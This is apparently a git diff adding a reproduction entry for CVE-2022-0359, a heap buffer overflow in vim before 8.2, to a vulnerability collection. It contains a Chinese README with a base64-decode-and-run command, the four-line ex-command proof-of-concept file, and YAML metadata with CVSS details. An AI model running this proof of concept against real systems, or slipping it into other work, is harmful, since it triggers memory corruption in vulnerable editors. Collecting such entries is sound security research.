diff --git a/cve/vim/2022/CVE-2022-0359/README.md b/cve/vim/2022/CVE-2022-0359/README.md new file mode 100644 index 0000000000000000000000000000000000000000..68534a6d29100041aab522171c20418268d63e6b --- /dev/null +++ b/cve/vim/2022/CVE-2022-0359/README.md @@ -0,0 +1,7 @@ +### 漏洞复现 +```shell +echo -n cmV0ODAwCnMvXHYvCQpzZSBhaQpzaWwwbm9ybTppDQ== | base64 -d > heap_ow_poc1 +vim -u NONE -i NONE -n -X -Z -e -m -s -S heap_ow_poc1 -c :qa! +``` +![](./png/CVE-2022-0359.png) + diff --git a/cve/vim/2022/CVE-2022-0359/heap_ow_poc1 b/cve/vim/2022/CVE-2022-0359/heap_ow_poc1 new file mode 100644 index 0000000000000000000000000000000000000000..44b8b065a3298ca6e0ada83e22f1c0103eb283e2 --- /dev/null +++ b/cve/vim/2022/CVE-2022-0359/heap_ow_poc1 @@ -0,0 +1,4 @@ +ret800 +s/\v/ +se ai +sil0norm:i \ No newline at end of file diff --git a/cve/vim/2022/CVE-2022-0359/png/CVE-2022-0359.png b/cve/vim/2022/CVE-2022-0359/png/CVE-2022-0359.png new file mode 100644 index 0000000000000000000000000000000000000000..42b5dbfd04b9444dce5260f8bf4f99e5569eda28 Binary files /dev/null and b/cve/vim/2022/CVE-2022-0359/png/CVE-2022-0359.png differ diff --git a/cve/vim/2022/yaml/CVE-2022-0359.yaml b/cve/vim/2022/yaml/CVE-2022-0359.yaml new file mode 100644 index 0000000000000000000000000000000000000000..63ba211001dc9173e3a41d950b49233f2913d6dc --- /dev/null +++ b/cve/vim/2022/yaml/CVE-2022-0359.yaml @@ -0,0 +1,20 @@ +id: CVE-2022-0359 +source: https://huntr.dev/bounties/a3192d90-4f82-4a67-b7a6-37046cc88def/ +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: high + description: | + vim 存在安全漏洞,该漏洞源于在8.2之前的vim中基于堆的缓冲区溢出。 + scope-of-influence: + vim < 8.2 + reference: + - https://github.com/vim/vim/commit/85b6747abc15a7a81086db31289cf1b8b17e6cb1 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0359 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2022-0359 + cwe-id: CWE-787,CWE-122 + cnvd-id: None + kve-id: None + tags: 缓冲区溢出,cve2022 \ No newline at end of file diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml index 2f4ff9eefc62108d512ab53f150a411cf9ad1318..d5c6b05c8c710e9f031e6616528c057570a5fc6c 100644 --- a/vulnerability_list.yaml +++ b/vulnerability_list.yaml @@ -22,8 +22,10 @@ cve: polkit: - CVE-2021-4034 vim: - - CVE-2022-0729 + - CVE-2022-0359 - CVE-2022-0629 + - CVE-2022-0729 + cnvd: kve: kylin-software-properties: